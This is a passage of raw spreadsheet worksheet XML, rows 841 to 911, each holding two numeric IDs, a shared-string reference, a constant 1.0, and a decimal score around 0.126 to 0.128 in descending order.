      </c>
      <c r="C841" s="2" t="s">
        <v>744</v>
      </c>
      <c r="D841" s="2">
        <v>1.0</v>
      </c>
      <c r="E841" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F841" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="842" ht="15.75" customHeight="1">
      <c r="A842" s="1">
        <v>29807.0</v>
      </c>
      <c r="B842" s="2">
        <v>3.5174229E7</v>
      </c>
      <c r="C842" s="2" t="s">
        <v>745</v>
      </c>
      <c r="D842" s="2">
        <v>1.0</v>
      </c>
      <c r="E842" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F842" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="843" ht="15.75" customHeight="1">
      <c r="A843" s="1">
        <v>30163.0</v>
      </c>
      <c r="B843" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C843" s="2" t="s">
        <v>746</v>
      </c>
      <c r="D843" s="2">
        <v>1.0</v>
      </c>
      <c r="E843" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F843" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="844" ht="15.75" customHeight="1">
      <c r="A844" s="1">
        <v>30279.0</v>
      </c>
      <c r="B844" s="2">
        <v>3.7728306E7</v>
      </c>
      <c r="C844" s="2" t="s">
        <v>747</v>
      </c>
      <c r="D844" s="2">
        <v>1.0</v>
      </c>
      <c r="E844" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F844" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="845" ht="15.75" customHeight="1">
      <c r="A845" s="1">
        <v>30340.0</v>
      </c>
      <c r="B845" s="2">
        <v>3.8160811E7</v>
      </c>
      <c r="C845" s="2" t="s">
        <v>748</v>
      </c>
      <c r="D845" s="2">
        <v>1.0</v>
      </c>
      <c r="E845" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F845" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="846" ht="15.75" customHeight="1">
      <c r="A846" s="1">
        <v>30399.0</v>
      </c>
      <c r="B846" s="2">
        <v>3.8697756E7</v>
      </c>
      <c r="C846" s="2" t="s">
        <v>749</v>
      </c>
      <c r="D846" s="2">
        <v>1.0</v>
      </c>
      <c r="E846" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F846" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="847" ht="15.75" customHeight="1">
      <c r="A847" s="1">
        <v>30424.0</v>
      </c>
      <c r="B847" s="2">
        <v>3.894059E7</v>
      </c>
      <c r="C847" s="2" t="s">
        <v>750</v>
      </c>
      <c r="D847" s="2">
        <v>1.0</v>
      </c>
      <c r="E847" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F847" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="848" ht="15.75" customHeight="1">
      <c r="A848" s="1">
        <v>30579.0</v>
      </c>
      <c r="B848" s="2">
        <v>4112371.0</v>
      </c>
      <c r="C848" s="2" t="s">
        <v>751</v>
      </c>
      <c r="D848" s="2">
        <v>1.0</v>
      </c>
      <c r="E848" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F848" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="849" ht="15.75" customHeight="1">
      <c r="A849" s="1">
        <v>30616.0</v>
      </c>
      <c r="B849" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C849" s="2" t="s">
        <v>752</v>
      </c>
      <c r="D849" s="2">
        <v>1.0</v>
      </c>
      <c r="E849" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F849" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="850" ht="15.75" customHeight="1">
      <c r="A850" s="1">
        <v>30784.0</v>
      </c>
      <c r="B850" s="2">
        <v>4.482202E7</v>
      </c>
      <c r="C850" s="2" t="s">
        <v>753</v>
      </c>
      <c r="D850" s="2">
        <v>1.0</v>
      </c>
      <c r="E850" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F850" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="851" ht="15.75" customHeight="1">
      <c r="A851" s="1">
        <v>31019.0</v>
      </c>
      <c r="B851" s="2">
        <v>4.7776948E7</v>
      </c>
      <c r="C851" s="2" t="s">
        <v>754</v>
      </c>
      <c r="D851" s="2">
        <v>1.0</v>
      </c>
      <c r="E851" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F851" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="852" ht="15.75" customHeight="1">
      <c r="A852" s="1">
        <v>31280.0</v>
      </c>
      <c r="B852" s="2">
        <v>4.9600376E7</v>
      </c>
      <c r="C852" s="2" t="s">
        <v>755</v>
      </c>
      <c r="D852" s="2">
        <v>1.0</v>
      </c>
      <c r="E852" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F852" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="853" ht="15.75" customHeight="1">
      <c r="A853" s="1">
        <v>31592.0</v>
      </c>
      <c r="B853" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C853" s="2" t="s">
        <v>756</v>
      </c>
      <c r="D853" s="2">
        <v>1.0</v>
      </c>
      <c r="E853" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F853" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="854" ht="15.75" customHeight="1">
      <c r="A854" s="1">
        <v>31803.0</v>
      </c>
      <c r="B854" s="2">
        <v>5.2431411E7</v>
      </c>
      <c r="C854" s="2" t="s">
        <v>757</v>
      </c>
      <c r="D854" s="2">
        <v>1.0</v>
      </c>
      <c r="E854" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F854" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="855" ht="15.75" customHeight="1">
      <c r="A855" s="1">
        <v>32035.0</v>
      </c>
      <c r="B855" s="2">
        <v>5.3622601E7</v>
      </c>
      <c r="C855" s="2" t="s">
        <v>758</v>
      </c>
      <c r="D855" s="2">
        <v>1.0</v>
      </c>
      <c r="E855" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F855" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="856" ht="15.75" customHeight="1">
      <c r="A856" s="1">
        <v>32792.0</v>
      </c>
      <c r="B856" s="2">
        <v>6143726.0</v>
      </c>
      <c r="C856" s="2" t="s">
        <v>727</v>
      </c>
      <c r="D856" s="2">
        <v>1.0</v>
      </c>
      <c r="E856" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F856" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="857" ht="15.75" customHeight="1">
      <c r="A857" s="1">
        <v>33493.0</v>
      </c>
      <c r="B857" s="2">
        <v>8001451.0</v>
      </c>
      <c r="C857" s="2" t="s">
        <v>759</v>
      </c>
      <c r="D857" s="2">
        <v>1.0</v>
      </c>
      <c r="E857" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F857" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="858" ht="15.75" customHeight="1">
      <c r="A858" s="1">
        <v>33741.0</v>
      </c>
      <c r="B858" s="2">
        <v>8555883.0</v>
      </c>
      <c r="C858" s="2" t="s">
        <v>731</v>
      </c>
      <c r="D858" s="2">
        <v>1.0</v>
      </c>
      <c r="E858" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F858" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="859" ht="15.75" customHeight="1">
      <c r="A859" s="1">
        <v>33823.0</v>
      </c>
      <c r="B859" s="2">
        <v>8911732.0</v>
      </c>
      <c r="C859" s="2" t="s">
        <v>729</v>
      </c>
      <c r="D859" s="2">
        <v>1.0</v>
      </c>
      <c r="E859" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F859" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="860" ht="15.75" customHeight="1">
      <c r="A860" s="1">
        <v>21544.0</v>
      </c>
      <c r="B860" s="2">
        <v>2.3548991E7</v>
      </c>
      <c r="C860" s="2" t="s">
        <v>760</v>
      </c>
      <c r="D860" s="2">
        <v>1.0</v>
      </c>
      <c r="E860" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F860" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="861" ht="15.75" customHeight="1">
      <c r="A861" s="1">
        <v>23082.0</v>
      </c>
      <c r="B861" s="2">
        <v>5062935.0</v>
      </c>
      <c r="C861" s="2" t="s">
        <v>761</v>
      </c>
      <c r="D861" s="2">
        <v>1.0</v>
      </c>
      <c r="E861" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F861" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="862" ht="15.75" customHeight="1">
      <c r="A862" s="1">
        <v>25268.0</v>
      </c>
      <c r="B862" s="2">
        <v>1.339304E7</v>
      </c>
      <c r="C862" s="2" t="s">
        <v>762</v>
      </c>
      <c r="D862" s="2">
        <v>1.0</v>
      </c>
      <c r="E862" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F862" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="863" ht="15.75" customHeight="1">
      <c r="A863" s="1">
        <v>29830.0</v>
      </c>
      <c r="B863" s="2">
        <v>3.5351506E7</v>
      </c>
      <c r="C863" s="2" t="s">
        <v>763</v>
      </c>
      <c r="D863" s="2">
        <v>1.0</v>
      </c>
      <c r="E863" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F863" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="864" ht="15.75" customHeight="1">
      <c r="A864" s="1">
        <v>24696.0</v>
      </c>
      <c r="B864" s="2">
        <v>1.1630585E7</v>
      </c>
      <c r="C864" s="2" t="s">
        <v>764</v>
      </c>
      <c r="D864" s="2">
        <v>1.0</v>
      </c>
      <c r="E864" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F864" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="865" ht="15.75" customHeight="1">
      <c r="A865" s="1">
        <v>16619.0</v>
      </c>
      <c r="B865" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C865" s="2" t="s">
        <v>765</v>
      </c>
      <c r="D865" s="2">
        <v>1.0</v>
      </c>
      <c r="E865" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F865" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="866" ht="15.75" customHeight="1">
      <c r="A866" s="1">
        <v>21329.0</v>
      </c>
      <c r="B866" s="2">
        <v>2.1047143E7</v>
      </c>
      <c r="C866" s="2" t="s">
        <v>766</v>
      </c>
      <c r="D866" s="2">
        <v>1.0</v>
      </c>
      <c r="E866" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F866" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="867" ht="15.75" customHeight="1">
      <c r="A867" s="1">
        <v>22507.0</v>
      </c>
      <c r="B867" s="2">
        <v>3.7400051E7</v>
      </c>
      <c r="C867" s="2" t="s">
        <v>767</v>
      </c>
      <c r="D867" s="2">
        <v>1.0</v>
      </c>
      <c r="E867" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F867" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="868" ht="15.75" customHeight="1">
      <c r="A868" s="1">
        <v>25031.0</v>
      </c>
      <c r="B868" s="2">
        <v>1.2828729E7</v>
      </c>
      <c r="C868" s="2" t="s">
        <v>768</v>
      </c>
      <c r="D868" s="2">
        <v>1.0</v>
      </c>
      <c r="E868" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F868" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="869" ht="15.75" customHeight="1">
      <c r="A869" s="1">
        <v>26902.0</v>
      </c>
      <c r="B869" s="2">
        <v>1.9288228E7</v>
      </c>
      <c r="C869" s="2" t="s">
        <v>769</v>
      </c>
      <c r="D869" s="2">
        <v>1.0</v>
      </c>
      <c r="E869" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F869" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="870" ht="15.75" customHeight="1">
      <c r="A870" s="1">
        <v>28323.0</v>
      </c>
      <c r="B870" s="2">
        <v>2.5807819E7</v>
      </c>
      <c r="C870" s="2" t="s">
        <v>770</v>
      </c>
      <c r="D870" s="2">
        <v>1.0</v>
      </c>
      <c r="E870" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F870" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="871" ht="15.75" customHeight="1">
      <c r="A871" s="1">
        <v>28605.0</v>
      </c>
      <c r="B871" s="2">
        <v>2.7095862E7</v>
      </c>
      <c r="C871" s="2" t="s">
        <v>771</v>
      </c>
      <c r="D871" s="2">
        <v>1.0</v>
      </c>
      <c r="E871" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F871" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="872" ht="15.75" customHeight="1">
      <c r="A872" s="1">
        <v>30800.0</v>
      </c>
      <c r="B872" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C872" s="2" t="s">
        <v>772</v>
      </c>
      <c r="D872" s="2">
        <v>1.0</v>
      </c>
      <c r="E872" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F872" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="873" ht="15.75" customHeight="1">
      <c r="A873" s="1">
        <v>30861.0</v>
      </c>
      <c r="B873" s="2">
        <v>4.6177438E7</v>
      </c>
      <c r="C873" s="2" t="s">
        <v>772</v>
      </c>
      <c r="D873" s="2">
        <v>1.0</v>
      </c>
      <c r="E873" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F873" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="874" ht="15.75" customHeight="1">
      <c r="A874" s="1">
        <v>33494.0</v>
      </c>
      <c r="B874" s="2">
        <v>8003185.0</v>
      </c>
      <c r="C874" s="2" t="s">
        <v>773</v>
      </c>
      <c r="D874" s="2">
        <v>1.0</v>
      </c>
      <c r="E874" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F874" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="875" ht="15.75" customHeight="1">
      <c r="A875" s="1">
        <v>16560.0</v>
      </c>
      <c r="B875" s="2">
        <v>4.6843106E7</v>
      </c>
      <c r="C875" s="2" t="s">
        <v>774</v>
      </c>
      <c r="D875" s="2">
        <v>1.0</v>
      </c>
      <c r="E875" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F875" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="876" ht="15.75" customHeight="1">
      <c r="A876" s="1">
        <v>21043.0</v>
      </c>
      <c r="B876" s="2">
        <v>1.7680944E7</v>
      </c>
      <c r="C876" s="2" t="s">
        <v>775</v>
      </c>
      <c r="D876" s="2">
        <v>1.0</v>
      </c>
      <c r="E876" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F876" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="877" ht="15.75" customHeight="1">
      <c r="A877" s="1">
        <v>23455.0</v>
      </c>
      <c r="B877" s="2">
        <v>5.6918359E7</v>
      </c>
      <c r="C877" s="2" t="s">
        <v>776</v>
      </c>
      <c r="D877" s="2">
        <v>1.0</v>
      </c>
      <c r="E877" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F877" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="878" ht="15.75" customHeight="1">
      <c r="A878" s="1">
        <v>20567.0</v>
      </c>
      <c r="B878" s="2">
        <v>1.348984E7</v>
      </c>
      <c r="C878" s="2" t="s">
        <v>777</v>
      </c>
      <c r="D878" s="2">
        <v>1.0</v>
      </c>
      <c r="E878" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F878" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="879" ht="15.75" customHeight="1">
      <c r="A879" s="1">
        <v>26591.0</v>
      </c>
      <c r="B879" s="2">
        <v>1.7954793E7</v>
      </c>
      <c r="C879" s="2" t="s">
        <v>778</v>
      </c>
      <c r="D879" s="2">
        <v>1.0</v>
      </c>
      <c r="E879" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F879" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="880" ht="15.75" customHeight="1">
      <c r="A880" s="1">
        <v>24880.0</v>
      </c>
      <c r="B880" s="2">
        <v>1.2228573E7</v>
      </c>
      <c r="C880" s="2" t="s">
        <v>779</v>
      </c>
      <c r="D880" s="2">
        <v>1.0</v>
      </c>
      <c r="E880" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F880" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="881" ht="15.75" customHeight="1">
      <c r="A881" s="1">
        <v>31133.0</v>
      </c>
      <c r="B881" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C881" s="2" t="s">
        <v>780</v>
      </c>
      <c r="D881" s="2">
        <v>1.0</v>
      </c>
      <c r="E881" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F881" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="882" ht="15.75" customHeight="1">
      <c r="A882" s="1">
        <v>25301.0</v>
      </c>
      <c r="B882" s="2">
        <v>1.3413791E7</v>
      </c>
      <c r="C882" s="2" t="s">
        <v>781</v>
      </c>
      <c r="D882" s="2">
        <v>1.0</v>
      </c>
      <c r="E882" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F882" s="2">
        <v>0.1268768768768769</v>
      </c>
    </row>
    <row r="883" ht="15.75" customHeight="1">
      <c r="A883" s="1">
        <v>22343.0</v>
      </c>
      <c r="B883" s="2">
        <v>3.4501267E7</v>
      </c>
      <c r="C883" s="2" t="s">
        <v>782</v>
      </c>
      <c r="D883" s="2">
        <v>1.0</v>
      </c>
      <c r="E883" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F883" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="884" ht="15.75" customHeight="1">
      <c r="A884" s="1">
        <v>21960.0</v>
      </c>
      <c r="B884" s="2">
        <v>2.9022814E7</v>
      </c>
      <c r="C884" s="2" t="s">
        <v>783</v>
      </c>
      <c r="D884" s="2">
        <v>1.0</v>
      </c>
      <c r="E884" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F884" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="885" ht="15.75" customHeight="1">
      <c r="A885" s="1">
        <v>28852.0</v>
      </c>
      <c r="B885" s="2">
        <v>2.9022813E7</v>
      </c>
      <c r="C885" s="2" t="s">
        <v>783</v>
      </c>
      <c r="D885" s="2">
        <v>1.0</v>
      </c>
      <c r="E885" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F885" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="886" ht="15.75" customHeight="1">
      <c r="A886" s="1">
        <v>28863.0</v>
      </c>
      <c r="B886" s="2">
        <v>2.9065165E7</v>
      </c>
      <c r="C886" s="2" t="s">
        <v>784</v>
      </c>
      <c r="D886" s="2">
        <v>1.0</v>
      </c>
      <c r="E886" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F886" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="887" ht="15.75" customHeight="1">
      <c r="A887" s="1">
        <v>29211.0</v>
      </c>
      <c r="B887" s="2">
        <v>3.0781564E7</v>
      </c>
      <c r="C887" s="2" t="s">
        <v>785</v>
      </c>
      <c r="D887" s="2">
        <v>1.0</v>
      </c>
      <c r="E887" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F887" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="888" ht="15.75" customHeight="1">
      <c r="A888" s="1">
        <v>27275.0</v>
      </c>
      <c r="B888" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C888" s="2" t="s">
        <v>630</v>
      </c>
      <c r="D888" s="2">
        <v>1.0</v>
      </c>
      <c r="E888" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F888" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="889" ht="15.75" customHeight="1">
      <c r="A889" s="1">
        <v>20337.0</v>
      </c>
      <c r="B889" s="2">
        <v>1.1565484E7</v>
      </c>
      <c r="C889" s="2" t="s">
        <v>670</v>
      </c>
      <c r="D889" s="2">
        <v>1.0</v>
      </c>
      <c r="E889" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F889" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="890" ht="15.75" customHeight="1">
      <c r="A890" s="1">
        <v>22617.0</v>
      </c>
      <c r="B890" s="2">
        <v>4.0004469E7</v>
      </c>
      <c r="C890" s="2" t="s">
        <v>786</v>
      </c>
      <c r="D890" s="2">
        <v>1.0</v>
      </c>
      <c r="E890" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F890" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="891" ht="15.75" customHeight="1">
      <c r="A891" s="1">
        <v>25647.0</v>
      </c>
      <c r="B891" s="2">
        <v>1.451946E7</v>
      </c>
      <c r="C891" s="2" t="s">
        <v>787</v>
      </c>
      <c r="D891" s="2">
        <v>1.0</v>
      </c>
      <c r="E891" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F891" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="892" ht="15.75" customHeight="1">
      <c r="A892" s="1">
        <v>7540.0</v>
      </c>
      <c r="B892" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C892" s="2" t="s">
        <v>788</v>
      </c>
      <c r="D892" s="2">
        <v>1.0</v>
      </c>
      <c r="E892" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F892" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="893" ht="15.75" customHeight="1">
      <c r="A893" s="1">
        <v>16672.0</v>
      </c>
      <c r="B893" s="2">
        <v>4.7276002E7</v>
      </c>
      <c r="C893" s="2" t="s">
        <v>789</v>
      </c>
      <c r="D893" s="2">
        <v>1.0</v>
      </c>
      <c r="E893" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F893" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="894" ht="15.75" customHeight="1">
      <c r="A894" s="1">
        <v>28404.0</v>
      </c>
      <c r="B894" s="2">
        <v>2.6283067E7</v>
      </c>
      <c r="C894" s="2" t="s">
        <v>790</v>
      </c>
      <c r="D894" s="2">
        <v>1.0</v>
      </c>
      <c r="E894" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F894" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="895" ht="15.75" customHeight="1">
      <c r="A895" s="1">
        <v>25333.0</v>
      </c>
      <c r="B895" s="2">
        <v>1.3474356E7</v>
      </c>
      <c r="C895" s="2" t="s">
        <v>791</v>
      </c>
      <c r="D895" s="2">
        <v>1.0</v>
      </c>
      <c r="E895" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F895" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="896" ht="15.75" customHeight="1">
      <c r="A896" s="1">
        <v>17280.0</v>
      </c>
      <c r="B896" s="2">
        <v>4.9209107E7</v>
      </c>
      <c r="C896" s="2" t="s">
        <v>792</v>
      </c>
      <c r="D896" s="2">
        <v>1.0</v>
      </c>
      <c r="E896" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F896" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="897" ht="15.75" customHeight="1">
      <c r="A897" s="1">
        <v>22607.0</v>
      </c>
      <c r="B897" s="2">
        <v>3.9752388E7</v>
      </c>
      <c r="C897" s="2" t="s">
        <v>793</v>
      </c>
      <c r="D897" s="2">
        <v>1.0</v>
      </c>
      <c r="E897" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F897" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="898" ht="15.75" customHeight="1">
      <c r="A898" s="1">
        <v>22865.0</v>
      </c>
      <c r="B898" s="2">
        <v>4.7348491E7</v>
      </c>
      <c r="C898" s="2" t="s">
        <v>794</v>
      </c>
      <c r="D898" s="2">
        <v>1.0</v>
      </c>
      <c r="E898" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F898" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="899" ht="15.75" customHeight="1">
      <c r="A899" s="1">
        <v>23465.0</v>
      </c>
      <c r="B899" s="2">
        <v>5705586.0</v>
      </c>
      <c r="C899" s="2" t="s">
        <v>795</v>
      </c>
      <c r="D899" s="2">
        <v>1.0</v>
      </c>
      <c r="E899" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F899" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="900" ht="15.75" customHeight="1">
      <c r="A900" s="1">
        <v>24870.0</v>
      </c>
      <c r="B900" s="2">
        <v>1.2209559E7</v>
      </c>
      <c r="C900" s="2" t="s">
        <v>796</v>
      </c>
      <c r="D900" s="2">
        <v>1.0</v>
      </c>
      <c r="E900" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F900" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="901" ht="15.75" customHeight="1">
      <c r="A901" s="1">
        <v>27179.0</v>
      </c>
      <c r="B901" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C901" s="2" t="s">
        <v>719</v>
      </c>
      <c r="D901" s="2">
        <v>1.0</v>
      </c>
      <c r="E901" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F901" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="902" ht="15.75" customHeight="1">
      <c r="A902" s="1">
        <v>28737.0</v>
      </c>
      <c r="B902" s="2">
        <v>2.8045017E7</v>
      </c>
      <c r="C902" s="2" t="s">
        <v>797</v>
      </c>
      <c r="D902" s="2">
        <v>1.0</v>
      </c>
      <c r="E902" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F902" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="903" ht="15.75" customHeight="1">
      <c r="A903" s="1">
        <v>31022.0</v>
      </c>
      <c r="B903" s="2">
        <v>4.7777074E7</v>
      </c>
      <c r="C903" s="2" t="s">
        <v>754</v>
      </c>
      <c r="D903" s="2">
        <v>1.0</v>
      </c>
      <c r="E903" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F903" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="904" ht="15.75" customHeight="1">
      <c r="A904" s="1">
        <v>32491.0</v>
      </c>
      <c r="B904" s="2">
        <v>5.7006194E7</v>
      </c>
      <c r="C904" s="2" t="s">
        <v>798</v>
      </c>
      <c r="D904" s="2">
        <v>1.0</v>
      </c>
      <c r="E904" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F904" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="905" ht="15.75" customHeight="1">
      <c r="A905" s="1">
        <v>33394.0</v>
      </c>
      <c r="B905" s="2">
        <v>7701500.0</v>
      </c>
      <c r="C905" s="2" t="s">
        <v>799</v>
      </c>
      <c r="D905" s="2">
        <v>1.0</v>
      </c>
      <c r="E905" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F905" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="906" ht="15.75" customHeight="1">
      <c r="A906" s="1">
        <v>376.0</v>
      </c>
      <c r="B906" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C906" s="2" t="s">
        <v>800</v>
      </c>
      <c r="D906" s="2">
        <v>1.0</v>
      </c>
      <c r="E906" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F906" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="907" ht="15.75" customHeight="1">
      <c r="A907" s="1">
        <v>806.0</v>
      </c>
      <c r="B907" s="2">
        <v>2.1318154E7</v>
      </c>
      <c r="C907" s="2" t="s">
        <v>801</v>
      </c>
      <c r="D907" s="2">
        <v>1.0</v>
      </c>
      <c r="E907" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F907" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="908" ht="15.75" customHeight="1">
      <c r="A908" s="1">
        <v>9827.0</v>
      </c>
      <c r="B908" s="2">
        <v>5.663441E7</v>
      </c>
      <c r="C908" s="2" t="s">
        <v>802</v>
      </c>
      <c r="D908" s="2">
        <v>1.0</v>
      </c>
      <c r="E908" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F908" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="909" ht="15.75" customHeight="1">
      <c r="A909" s="1">
        <v>12181.0</v>
      </c>
      <c r="B909" s="2">
        <v>2.7466256E7</v>
      </c>
      <c r="C909" s="2" t="s">
        <v>803</v>
      </c>
      <c r="D909" s="2">
        <v>1.0</v>
      </c>
      <c r="E909" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F909" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="910" ht="15.75" customHeight="1">
      <c r="A910" s="1">
        <v>14612.0</v>
      </c>
      <c r="B910" s="2">
        <v>4.0258521E7</v>
      </c>
      <c r="C910" s="2" t="s">
        <v>804</v>
      </c>
      <c r="D910" s="2">
        <v>1.0</v>
      </c>
      <c r="E910" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F910" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="911" ht="15.75" customHeight="1">
      <c r="A911" s="1">
        <v>15070.0</v>
      </c>
